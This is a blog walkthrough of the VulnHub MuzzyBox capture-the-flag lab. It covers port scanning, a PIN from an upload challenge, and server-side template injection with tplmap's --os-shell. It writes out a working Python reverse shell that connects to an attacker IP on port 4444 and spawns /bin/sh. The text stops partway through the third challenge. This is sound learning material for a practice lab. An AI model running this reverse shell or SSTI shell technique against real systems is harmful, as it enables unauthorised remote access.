VulnHub – MuzzyBox Walkthrough

Scan the host with nmap –A –T4 –p- 192.168.1.12 –vv

We got few open ports let’s try one by one and see:

Now we have three challenges, the first on port 3000 and port 9633:

On port 3000 we have a simple upload box to upload a .png file

And on port 9633 we have idcard for us to fill as the instruction said on port 3000

We going to make it look something like this:

After we upload it we get something similar to this:

We got a Pin: 123456789 now let’s take a look on the challenge No.2 on port 8989:

By clicking on the tiny icon on the far right we get a pop box asking for pin to unlock it:

Now we use the pin we got 123456789:

We get a console we that we can upload a python shell script, we are going to turn this script

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.13”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Into this:

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect((“192.168.1.11”,4444))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call([“/bin/sh”,”-i”])

Then we catch the flag in the directory /flag/ ctf2.py [‘FLAG’] = ‘N$cTF{R34D_F!L3_/home/webssti/noflag.txt}’

Now for challenge 3, it says:

After system compromise root user is auditing the webserver files and directories by using “bash ls” and “sudo ls” commands. Can you able to get the /root/Final_Flag.txt file using the Out-of-Band technique??

Link: http://{IP}:15000/page?name=muzzy

Now in this specific issue i searched the web and all the roads leads to “Server Side Template Injection” and the most used tool for this is this tool TPLMAP after we download it we use it as follow:

First make ure to install the requirements: pip install –r requirements

Then ./tplmap.py -u ‘http://192.168.1.12:15000/page?name=hacker’ –os-shell

Ok we got in but we are stuck with limited shell, but a work around is we can use the absolute path to figure out what’s inside the directories:

The flag says ssh nsctf iamnsce so we ssh to the host using the name nsctf and the password iamnsce:

Now from here in the challenge 3 it says that “After system compromise root user is auditing the webserver files and directories by using “bash ls” and “sudo ls” commands”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s